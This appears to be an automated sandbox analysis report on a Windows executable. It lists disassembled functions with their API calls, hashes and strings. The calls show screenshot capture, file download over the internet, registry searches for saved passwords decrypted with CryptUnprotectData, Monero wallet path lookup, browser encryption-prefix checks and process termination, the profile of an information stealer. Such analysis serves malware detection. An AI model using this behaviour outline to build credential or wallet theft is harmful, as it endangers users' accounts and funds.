                                  • Opcode ID: 404d49ec314c2c56212ab779533651963609c530e51fc62bb988d444af05ff79
                                  • Instruction ID: b196c42955808a3628deb6590914a2b1c471de0066aee4b7def983081d23dbce
                                  • Opcode Fuzzy Hash: 404d49ec314c2c56212ab779533651963609c530e51fc62bb988d444af05ff79
                                  • Instruction Fuzzy Hash: CE318F72A00215BBDB15DBE4EC89FEEB778BF55700F104055FA05E7280DBB0AA458BA5
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00320CF0), ref: 00324276
                                  • GetDesktopWindow.USER32 ref: 00324280
                                  • GetWindowRect.USER32(00000000,?), ref: 0032428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 003242BF
                                  • GetHGlobalFromStream.COMBASE(00320CF0,?), ref: 00324336
                                  • GlobalLock.KERNEL32(?), ref: 00324340
                                  • GlobalSize.KERNEL32(?), ref: 0032434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: 091725a0e225b463f074772e303733685bbb84903d8fe7497d3d18f46ddde6c6
                                  • Instruction ID: 92ae89e533e91bbe8aacdf5424f1e02f94010e97512f7536f1478b5b80e4118d
                                  • Opcode Fuzzy Hash: 091725a0e225b463f074772e303733685bbb84903d8fe7497d3d18f46ddde6c6
                                  • Instruction Fuzzy Hash: 84513EB5A10208AFDB15DFA4ED89AEEB7B9EF58300F104419F905E7350DB74AD09DBA0
                                  APIs
                                  • lstrcat.KERNEL32(?,0102DF10), ref: 0031E00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031E037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E07D
                                  • lstrcat.KERNEL32(?,?), ref: 0031E098
                                  • lstrcat.KERNEL32(?,?), ref: 0031E0AC
                                  • lstrcat.KERNEL32(?,0101B0E0), ref: 0031E0C0
                                  • lstrcat.KERNEL32(?,?), ref: 0031E0D4
                                  • lstrcat.KERNEL32(?,0102D1A8), ref: 0031E0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0031E126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: 237d03bee1619df3316890658b195d7de9aed14a377ef4f389838301ffb67409
                                  • Instruction ID: 6ecec46b254c9b7aaef7907b8299be85e479fef4704de90fc7e703633ca936e5
                                  • Opcode Fuzzy Hash: 237d03bee1619df3316890658b195d7de9aed14a377ef4f389838301ffb67409
                                  • Instruction Fuzzy Hash: 3C616FB191111CABCB5ADB64CC58ADE77B8BF5C300F1049A5BA09A7390DF709F899F90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00306AFF
                                  • InternetOpenA.WININET(0032CFEC,00000001,00000000,00000000,00000000), ref: 00306B2C
                                  • StrCmpCA.SHLWAPI(?,0102E3A8), ref: 00306B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00306B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00306B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00306BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00306BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00306BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 00306C10
                                  • InternetCloseHandle.WININET(00000000), ref: 00306C17
                                  • InternetCloseHandle.WININET(?), ref: 00306C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: d4545298477dcbf3a2de4ee70c9f4cf15b25638d3e2ef72da35f4a00ba22f5d4
                                  • Instruction ID: e0570be86115b50d4ca544d65f1a9edc1220180274afb045b331320fd51ba2b7
                                  • Opcode Fuzzy Hash: d4545298477dcbf3a2de4ee70c9f4cf15b25638d3e2ef72da35f4a00ba22f5d4
                                  • Instruction Fuzzy Hash: 034194B1601205ABDB25DF64DC9AFAE77B8EB14700F004454FA05EB2C0DF70AE549BA4
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030BC1F
                                  • lstrlen.KERNEL32(00000000), ref: 0030BC52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030BC7C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030BC84
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030BCAC
                                  • lstrlen.KERNEL32(00334AD4), ref: 0030BD23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 60a6a861e640125c160aae5013c75706fd67948a3526cb102f5e282963cbc408
                                  • Instruction ID: 04ef26b3bfb100d0411503405caa58fc90288c9febc546208f7a062e0fc94771
                                  • Opcode Fuzzy Hash: 60a6a861e640125c160aae5013c75706fd67948a3526cb102f5e282963cbc408
                                  • Instruction Fuzzy Hash: 7EA18370A02205CFCB26DF68D969AAEF7B4AF54304F198069E406DB3A1DF31DC45DB50
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00326014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 0032609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003260D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: 298212f656c547e0fac7e9c9c3e335258e41ea4a0a04537bdceb50464e4ba3cc
                                  • Instruction ID: 77607e68a17d2282cb922b4aa4dc5137118d3705679c22f71d5f961c16fbfb56
                                  • Opcode Fuzzy Hash: 298212f656c547e0fac7e9c9c3e335258e41ea4a0a04537bdceb50464e4ba3cc
                                  • Instruction Fuzzy Hash: 1561C170714514EBDB1ACF5CEDD196EB3BAEF84300B248A09E4828B781C730EE80D794
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E07D
                                  • lstrcat.KERNEL32(?,?), ref: 0031E098
                                  • lstrcat.KERNEL32(?,?), ref: 0031E0AC
                                  • lstrcat.KERNEL32(?,0101B0E0), ref: 0031E0C0
                                  • lstrcat.KERNEL32(?,?), ref: 0031E0D4
                                  • lstrcat.KERNEL32(?,0102D1A8), ref: 0031E0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0031E126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: 981061c522e3a1a4d8c3a29631b6973b6025910fb5c9d4f77876b04e8dd7d175
                                  • Instruction ID: 6cb6f8a5176bbc70b4411dc40dcbfa37c8d0abbd318737ddb949ce3a7d2a63ad
                                  • Opcode Fuzzy Hash: 981061c522e3a1a4d8c3a29631b6973b6025910fb5c9d4f77876b04e8dd7d175
                                  • Instruction Fuzzy Hash: 63419F7191111CABCB2AEB68DC59ADE73B4BF5C300F1049A4F90A97291DF709F899F90
                                  APIs
                                    • Part of subcall function 003077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00307805
                                    • Part of subcall function 003077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0030784A
                                    • Part of subcall function 003077D0: StrStrA.SHLWAPI(?,Password), ref: 003078B8
                                    • Part of subcall function 003077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003078EC
                                    • Part of subcall function 003077D0: HeapFree.KERNEL32(00000000), ref: 003078F3
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 00307A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 00307ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00307ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00307AF0
                                  • wsprintfA.USER32 ref: 00307B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00307B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00307B47
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 00307B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: fa595717c3267337bcc267fbc3eb48aa62944a838f6bf953d18760a653229567
                                  • Instruction ID: aef8b857a19106d1d0f146da036c4e2029ec693448347b07d5806937b521f34e
                                  • Opcode Fuzzy Hash: fa595717c3267337bcc267fbc3eb48aa62944a838f6bf953d18760a653229567
                                  • Instruction Fuzzy Hash: 1E31F672E01214AFCB16DBA8DC98AAFB779EB94300F140519F50593390DB70F909EBA0
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 0031820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00318243
                                  • lstrlen.KERNEL32(00000000), ref: 00318260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00318297
                                  • lstrlen.KERNEL32(00000000), ref: 003182B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003182EB
                                  • lstrlen.KERNEL32(00000000), ref: 00318308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00318337
                                  • lstrlen.KERNEL32(00000000), ref: 00318351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00318380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 1dbf9db40a7da92c59593cb7635f9bf3bc348e74cbd96d894af337c8d2db8e14
                                  • Instruction ID: a275dd4c6c7301e59fbb1e859a73ee369820e35ababbddbae62b8bcd5eddced5
                                  • Opcode Fuzzy Hash: 1dbf9db40a7da92c59593cb7635f9bf3bc348e74cbd96d894af337c8d2db8e14
                                  • Instruction Fuzzy Hash: 94517079A016029BDB1ADF78D858AABB7B8EF48700F154914AD16DB344DF30EDA1CBD0
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00307805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0030784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 003078B8
                                    • Part of subcall function 00307750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0030775E
                                    • Part of subcall function 00307750: RtlAllocateHeap.NTDLL(00000000), ref: 00307765
                                    • Part of subcall function 00307750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0030778D
                                    • Part of subcall function 00307750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003077AD
                                    • Part of subcall function 00307750: LocalFree.KERNEL32(?), ref: 003077B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003078EC
                                  • HeapFree.KERNEL32(00000000), ref: 003078F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00307A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: 8288a736743fc5a549425222585813787f6dd88b38d0fa8774070f37f0c9d16e
                                  • Instruction ID: 2d81bdd25afa7d769df5b30e8f73a9bc0d71f588614b5ff4eb55046fd2708877
                                  • Opcode Fuzzy Hash: 8288a736743fc5a549425222585813787f6dd88b38d0fa8774070f37f0c9d16e
                                  • Instruction Fuzzy Hash: 5D7120B1D0121DEFDB11DF95DC90AEEB7B9EF48300F104569E509A7240EB75AA89CB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00301135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0030113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00301159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00301173
                                  • RegCloseKey.ADVAPI32(?), ref: 0030117D
                                  Strings
                                  • wallet_path, xrefs: 0030116D
                                  • SOFTWARE\monero-project\monero-core, xrefs: 0030114F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: 8e42d0abfa694bd6d4a49f6986632702047cfcdd8ba330e34ab90d993d605158
                                  • Instruction ID: 82cfe81f97a0bd6fb2e4ef113eace369bba7260c958609d000369e03bfa0b34c
                                  • Opcode Fuzzy Hash: 8e42d0abfa694bd6d4a49f6986632702047cfcdd8ba330e34ab90d993d605158
                                  • Instruction Fuzzy Hash: 88F030B5640308BBD7149BE19C8DFEB7B7CEB14715F100154FE05E2380EAB05A4897A0
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00309E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00309E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 00309EA7
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  • lstrcpy.KERNEL32(00000000,00334C48), ref: 00309FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: 3679fafcd1d4f2c36408fcd03ecb64df7aa4d7e647a00d8d05fdedb1eb8a530c
                                  • Instruction ID: e25a25f0f0c0d440e109a136f471697e54583fa7f41e5f82486a6150479fa78a
                                  • Opcode Fuzzy Hash: 3679fafcd1d4f2c36408fcd03ecb64df7aa4d7e647a00d8d05fdedb1eb8a530c
                                  • Instruction Fuzzy Hash: 3351DF31A12209ABCB12EF68EC95B9E77A8AF10315F154025F909EF282DB70ED558BD0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0030565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00305661
                                  • InternetOpenA.WININET(0032CFEC,00000000,00000000,00000000,00000000), ref: 00305677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00305692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003056BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 003056E1
                                  • InternetCloseHandle.WININET(?), ref: 003056FA
                                  • InternetCloseHandle.WININET(00000000), ref: 00305701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: 1ec7a8ec705329ebba29fb57497057fdab6d724dc75888c8bb860b699b04bc70
                                  • Instruction ID: d7b417b8be201a1718535dd64616b56990d9de8b794ac4229eb5acf6ca25134f
                                  • Opcode Fuzzy Hash: 1ec7a8ec705329ebba29fb57497057fdab6d724dc75888c8bb860b699b04bc70
                                  • Instruction Fuzzy Hash: A341AC70A01609EFDB25CF54DC98BAAB7B4FF48700F1580A9E908AB3D0E7719945DF90
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00324759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00324769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0032477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 003247AB
                                  • CloseHandle.KERNEL32(00000000), ref: 003247B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 003247C0
                                  • CloseHandle.KERNEL32(00000000), ref: 003247CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: eb5ad1d52b523f7eaf50c1f5c0037436949713905723790eb9c67b990eb6ddf3
